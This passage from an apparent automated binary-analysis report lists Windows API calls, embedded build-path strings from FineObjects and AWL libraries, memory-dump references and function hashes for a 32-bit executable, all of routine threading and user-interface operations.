                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0049C251
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\finenetserverimpl.cpp, xrefs: 0049C247
                                                                                                • @fO, xrefs: 0049C2F8
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h, xrefs: 0049C2EE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterValue$CloseEventException@8HandleIncrementInterlockedThrow
                                                                                                • String ID: @fO$@fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\finenetserverimpl.cpp$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h
                                                                                                • API String ID: 1590588582-3583418452
                                                                                                • Opcode ID: 19bbd682dd68b27490cf2b65ccc6b8bb5deddeddc180606ea67bfbca79692ca2
                                                                                                • Instruction ID: bed7e7f930dd8b63954d2760d393762683f9927120d89151ca370b2473a81dab
                                                                                                • Opcode Fuzzy Hash: 19bbd682dd68b27490cf2b65ccc6b8bb5deddeddc180606ea67bfbca79692ca2
                                                                                                • Instruction Fuzzy Hash: 3B51F370A40244EFDB14DF74C945BEEBFB4BF19304F14416EE815A7291DBB8A908CBA9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000001), ref: 00434101
                                                                                                • ShowScrollBar.USER32(00000001,00000002,00000000,?,?,0043F0B7,00000000,?,?,0043EED7,?,?,00000000,00000009,?,?), ref: 00434177
                                                                                                • GetLastError.KERNEL32(?,0043EED7,?,?,00000000,00000009,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00434185
                                                                                                • ShowScrollBar.USER32(00000001,?,?,?,?,?,?,?,?,?,0043F0B7,00000000,?,?,0043EED7,?), ref: 004341F8
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0043F0B7,00000000,?,?,0043EED7,?,?,00000000), ref: 00434202
                                                                                                  • Part of subcall function 0043F1C0: IsWindow.USER32(00000001), ref: 0043F1F9
                                                                                                  • Part of subcall function 0043F1C0: IsWindow.USER32(00000001), ref: 0043F232
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window$ErrorLastScrollShow
                                                                                                • String ID: ::ShowScrollBar(hwnd, bar, show) != 0$@fO$@fO$AWL::CWindow::ShowScrollBar$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp
                                                                                                • API String ID: 706125784-4136393681
                                                                                                • Opcode ID: 22ab5f43fd8c9d9396567acb34324e35bd5c53987de76a6dec3df9f1d31773d9
                                                                                                • Instruction ID: 349b667e498a1b33629de4ca8b7e97c57c56f9c953f7a6c443458a4e7bce6aa1
                                                                                                • Opcode Fuzzy Hash: 22ab5f43fd8c9d9396567acb34324e35bd5c53987de76a6dec3df9f1d31773d9
                                                                                                • Instruction Fuzzy Hash: 8A3159317403116BEA2466255C46BBF6249DBD8B89F60106BF905EB3C2EA6CFC50866D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0046EA80: InterlockedIncrement.KERNEL32(00530380), ref: 0046EAB1
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0040F2F8
                                                                                                  • Part of subcall function 0046ACB0: InterlockedDecrement.KERNEL32(00000001), ref: 0046AD7D
                                                                                                  • Part of subcall function 00497A00: InterlockedDecrement.KERNEL32(00000008), ref: 00497A40
                                                                                                • InterlockedIncrement.KERNEL32(-00000006), ref: 0040F37D
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0040F39C
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0040F3F3
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0040F40E
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h, xrefs: 0040F351
                                                                                                • @fO, xrefs: 0040F3BF
                                                                                                • xMS, xrefs: 0040F418
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0040F3B5
                                                                                                • @fO, xrefs: 0040F35B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment$CriticalSectionValue$EnterException@8LeaveThrow
                                                                                                • String ID: @fO$@fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Errors.h$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h$xMS
                                                                                                • API String ID: 1491966972-4108246113
                                                                                                • Opcode ID: d8ebf3bf9d8c71462605632a93252db4ec6a34ade42c192e50860d60f1ac1a31
                                                                                                • Instruction ID: 954258c18701a8ac70faed80c032de6be2dab404761fedf99852dbed56163d15
                                                                                                • Opcode Fuzzy Hash: d8ebf3bf9d8c71462605632a93252db4ec6a34ade42c192e50860d60f1ac1a31
                                                                                                • Instruction Fuzzy Hash: 6841EF31A00614EBDB20DB54CD45FAFBBA4EF44B14F11856AF905AB381D7B8AE048BD9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0045D3FE
                                                                                                • SendMessageW.USER32(?,0000001A,0000002F,00000000), ref: 0045D431
                                                                                                • IsWindow.USER32(?), ref: 0045D4BB
                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000000), ref: 0045D4F1
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0045D40F
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h, xrefs: 0045D4CC
                                                                                                • @fO, xrefs: 0045D478
                                                                                                • @fO, xrefs: 0045D419
                                                                                                • @fO, xrefs: 0045D4D6
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp, xrefs: 0045D46E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl$d:\build\teamagent\_work\1\s\0\awl\src\toolbarawl.cpp
                                                                                                • API String ID: 701072176-3118920066
                                                                                                • Opcode ID: e44d55fdf81fe5ffe50aba8db8e11a00a35ef78affbf2509198cb70905401d23
                                                                                                • Instruction ID: 709ce2605428b0a127636ba80ffbcd6c3828f5cd709d80ceec402628e7e7ed0e
                                                                                                • Opcode Fuzzy Hash: e44d55fdf81fe5ffe50aba8db8e11a00a35ef78affbf2509198cb70905401d23
                                                                                                • Instruction Fuzzy Hash: 914181307407006BE734AF248D56F7B77A4AF45705F00482EFA9AAB2D2DB75E814CA49
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00534CF0), ref: 0047443E
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 004744E3
                                                                                                • InterlockedDecrement.KERNEL32(005305AC), ref: 004744EC
                                                                                                • LeaveCriticalSection.KERNEL32(00534CF0), ref: 00474514
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInterlockedLeaveValue$DecrementException@8IncrementThrow
                                                                                                • String ID: @fO$@fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp$xMS
                                                                                                • API String ID: 1149574261-2296510864
                                                                                                • Opcode ID: af81b94cb1f3bbcf75f9412bfbd5b347fcf0ff35148039f2a389265a61d529ac
                                                                                                • Instruction ID: b7ab844a73e46a3555750dc36c4ce1607eb8f3b85dd1025a3d4cfedb36f404da
                                                                                                • Opcode Fuzzy Hash: af81b94cb1f3bbcf75f9412bfbd5b347fcf0ff35148039f2a389265a61d529ac
                                                                                                • Instruction Fuzzy Hash: B4310970640344BBDB106F69CC42FBF7BA8FB45715F10861AF914DB2C2D7B89A008B9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 0042E35C
                                                                                                • InterlockedDecrement.KERNEL32(00530380), ref: 0042E454
                                                                                                  • Part of subcall function 004391E0: InterlockedIncrement.KERNEL32(00530380), ref: 00439205
                                                                                                  • Part of subcall function 004391E0: InterlockedDecrement.KERNEL32(?), ref: 0043923D
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042E406
                                                                                                  • Part of subcall function 00413610: InterlockedIncrement.KERNEL32(004F6640), ref: 0041365C
                                                                                                  • Part of subcall function 00413610: InterlockedDecrement.KERNEL32(004F6640), ref: 004136BA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042E3E7
                                                                                                • InterlockedIncrement.KERNEL32(?), ref: 0042E420
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0042E432
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$Increment
                                                                                                • String ID: (%s)$xMS$xMS$xMS
                                                                                                • API String ID: 2574743344-1229175999
                                                                                                • Opcode ID: 7f9860f7bb8121ea004d0e0c7d3ffe440a12708c4a81aaf33e242ec9d08368c6
                                                                                                • Instruction ID: 644fb6bdccf33f5ad73a81ae918d121dc695e36cdd865b2272b0fa9ad9381244
                                                                                                • Opcode Fuzzy Hash: 7f9860f7bb8121ea004d0e0c7d3ffe440a12708c4a81aaf33e242ec9d08368c6
                                                                                                • Instruction Fuzzy Hash: 1541EF31A01615EBCB00EF95C805BEFBBB4FF44704F14845AF845A7382C7B8AA04CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000058,00000044,0000002C), ref: 004A023B
                                                                                                • InterlockedCompareExchange.KERNEL32(00000048,00000003,00000002), ref: 004A0257
                                                                                                • CloseHandle.KERNEL32(?), ref: 004A0296
                                                                                                • GetLastError.KERNEL32 ref: 004A02A0
                                                                                                • InterlockedExchange.KERNEL32(?,00000000), ref: 004A02E8
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 004A033D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeInterlockedSection$CloseCompareEnterErrorHandleLastLeave
                                                                                                • String ID: @fO$@fO$@fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\threadowner.cpp
                                                                                                • API String ID: 3501859523-1214887512
                                                                                                • Opcode ID: e5758e5ed9de63bf11fb3bc319bc369cad69eb5371e082eb312bea5acca89d1c
                                                                                                • Instruction ID: 7ced9242808e0330e5dad559077a983be0203477554bee654ae234623e61ddf0
                                                                                                • Opcode Fuzzy Hash: e5758e5ed9de63bf11fb3bc319bc369cad69eb5371e082eb312bea5acca89d1c
                                                                                                • Instruction Fuzzy Hash: 9931F635640308AFDB109F68DD8AB7EBB70FB15700F1444AAF905EB2D2D7B99910C7A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(00000000), ref: 00430059
                                                                                                • GetProcAddress.KERNEL32(SHGetStockIconInfo,00000000), ref: 004300B0
                                                                                                • GetLastError.KERNEL32 ref: 004300BF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$AddressProc
                                                                                                • String ID: @fO$AWL::loadShellIcon$SHGetStockIconInfo$d:\build\teamagent\_work\1\s\0\awl\src\userobjectawl.cpp$getStockIconInfo != 0$shell32.dll$shellLib != 0
                                                                                                • API String ID: 1975335638-1517090700
                                                                                                • Opcode ID: c0cb284432e0ec42845913495735345fa736dcbbd535359163492188fe439ae2
                                                                                                • Instruction ID: ad5eab3bb7396a21ae34002f916d8ddb5abe71cab275eb8931d9223c7200f213
                                                                                                • Opcode Fuzzy Hash: c0cb284432e0ec42845913495735345fa736dcbbd535359163492188fe439ae2
                                                                                                • Instruction Fuzzy Hash: 5E312730A4030157EF242764ACA6B7F35B5A768309F50263BF945D63D2FABD8C41825E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00459AE0: GetLastError.KERNEL32(00000030,00000030), ref: 00459B72
                                                                                                  • Part of subcall function 00459AE0: GetLastError.KERNEL32(00000030,00000030), ref: 00459BCF
                                                                                                  • Part of subcall function 004524B0: IsWindow.USER32(?), ref: 004524BF
                                                                                                  • Part of subcall function 004524B0: SendMessageW.USER32(?,00000459,00000029,00000000), ref: 004524F5
                                                                                                • IsWindow.USER32(?), ref: 0044E2A5
                                                                                                • SendMessageW.USER32(?,00000445,00000000,00000001), ref: 0044E2DD
                                                                                                • IsWindow.USER32(?), ref: 0044E2EB
                                                                                                • SendMessageW.USER32(?,00000443,00000001,00000000), ref: 0044E31D
                                                                                                • IsWindow.USER32(?), ref: 0044E32B
                                                                                                • SendMessageW.USER32(?,00000478,00000000,000000B2), ref: 0044E360
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow$ErrorLast
                                                                                                • String ID: @fO$@fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\richeditctrlawl.h
                                                                                                • API String ID: 490836792-3465192793
                                                                                                • Opcode ID: 63b6e551abe6da331a7bdf78f43b6b19d02af574b131414990490dbfc8a76da9
                                                                                                • Instruction ID: f5aa0e136b22d35967eeba8c2db50823e1aadb2d3b2802240a880870bbf9a850
                                                                                                • Opcode Fuzzy Hash: 63b6e551abe6da331a7bdf78f43b6b19d02af574b131414990490dbfc8a76da9
                                                                                                • Instruction Fuzzy Hash: B321A77178071167FA306A668D43F7B22586F40F04F51462EBE45FB2C6EBE9EC01469C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32 ref: 0043810C
                                                                                                • GetMenuItemCount.USER32 ref: 00438144
                                                                                                • InsertMenuItemW.USER32(?,00000000,00000001,00000030), ref: 00438152
                                                                                                • InterlockedDecrement.KERNEL32 ref: 00438160
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInterlockedItemMenuSectionValue$CountDecrementEnterException@8IncrementInsertLeaveThrow
                                                                                                • String ID: 0$@fO$@fO$E$d:\build\teamagent\_work\1\s\0\awl\src\menuawl.cpp$xMS
                                                                                                • API String ID: 2333824335-2002814129
                                                                                                • Opcode ID: ffd3730eb863768f7fa8b34208b9c4513ac890c2b08eae115703f58f2507c581
                                                                                                • Instruction ID: 6d9f090050e5b7f4dff3026f7460a5ad1aee611d4e033263a01fdd689d8ac478
                                                                                                • Opcode Fuzzy Hash: ffd3730eb863768f7fa8b34208b9c4513ac890c2b08eae115703f58f2507c581
                                                                                                • Instruction Fuzzy Hash: ED21B171940719ABDB109F98CC46BAFBBB8FB48714F10412EF914E7281E7B95901CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00000170,?,00000000), ref: 0049C49E
                                                                                                • LeaveCriticalSection.KERNEL32(00000170,00000000,00000000), ref: 0049C53D
                                                                                                • EnterCriticalSection.KERNEL32(00000170), ref: 0049C5E8
                                                                                                • LeaveCriticalSection.KERNEL32(00000170), ref: 0049C626
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 0049D8B0: InterlockedDecrement.KERNEL32(00000008), ref: 0049D907
                                                                                                • LeaveCriticalSection.KERNEL32(00000170), ref: 0049C6AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$Enter$Value$DecrementException@8InterlockedThrow
                                                                                                • String ID: @fO$@fO$@fO$@fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\finenetserverimpl.cpp$d:\build.agent\teamagent\_work\1\s\build\0\fineobjects\inc\object.h
                                                                                                • API String ID: 3224868960-2092047792
                                                                                                • Opcode ID: 17937cef8dc08f9a81162468760b1d794736567f015bedcdf861e905db7354e3
                                                                                                • Instruction ID: a22ccebb2256d7e1978b711d34fb5092d9ab9b5c0117a13fd1ed1f154e778593
                                                                                                • Opcode Fuzzy Hash: 17937cef8dc08f9a81162468760b1d794736567f015bedcdf861e905db7354e3
                                                                                                • Instruction Fuzzy Hash: 7861AF70A00258EFEB10DF64C949BEEBBB0BF19304F10416AE955B73C1D7B96A04CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00431940: EnterCriticalSection.KERNEL32 ref: 0043196C
                                                                                                  • Part of subcall function 00431940: GetCurrentThreadId.KERNEL32 ref: 00431986
                                                                                                  • Part of subcall function 00431940: GetCurrentThreadId.KERNEL32 ref: 00431991
                                                                                                  • Part of subcall function 00431940: LeaveCriticalSection.KERNEL32(00534568), ref: 004319AC
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00432147
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000,00000000,00502800,?,?,?,0043F3D3,?), ref: 00439460
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000,?,?,?,0043F3D3,?), ref: 00439467
                                                                                                  • Part of subcall function 00439430: InterlockedDecrement.KERNEL32(?), ref: 004394BA
                                                                                                  • Part of subcall function 00439430: GetCurrentProcess.KERNEL32(00000000), ref: 004394E5
                                                                                                  • Part of subcall function 00439430: TerminateProcess.KERNEL32(00000000), ref: 004394EC
                                                                                                  • Part of subcall function 0046C890: InterlockedDecrement.KERNEL32(?), ref: 0046CA18
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(00000000), ref: 0046CA51
                                                                                                  • Part of subcall function 004327B0: GetWindowLongW.USER32(00000000,000000FC), ref: 0043280E
                                                                                                  • Part of subcall function 004327B0: SetWindowLongW.USER32 ref: 0043284F
                                                                                                  • Part of subcall function 004327B0: GetLastError.KERNEL32(?,004321CD,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0043285C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalCurrentProcessSection$Value$DecrementEnterErrorInterlockedLastLeaveLongTerminateThreadWindow$Exception@8Throw
                                                                                                • String ID: @fO$@fO$@fO$@fO$@fO$@fO$AWL::CWindow::CreateEx$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjstatic.cpp$hwnd != 0
                                                                                                • API String ID: 1178957557-4172189748
                                                                                                • Opcode ID: 37ad387c7ff29c1ec42e5352cbb8cbf776a2ff88e343f19a2addc2b90b4c0821
                                                                                                • Instruction ID: 9be20b82b4fd96456463b0a944ffd2257ae0b819b70d5154e753917f582d8ecd
                                                                                                • Opcode Fuzzy Hash: 37ad387c7ff29c1ec42e5352cbb8cbf776a2ff88e343f19a2addc2b90b4c0821
                                                                                                • Instruction Fuzzy Hash: B251C43064030567EF24AF248E43BAF3665AB58B04F10551BFE15AB3C6EBFDE910868D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0047CF00: InterlockedIncrement.KERNEL32(00530380), ref: 0047CF2E
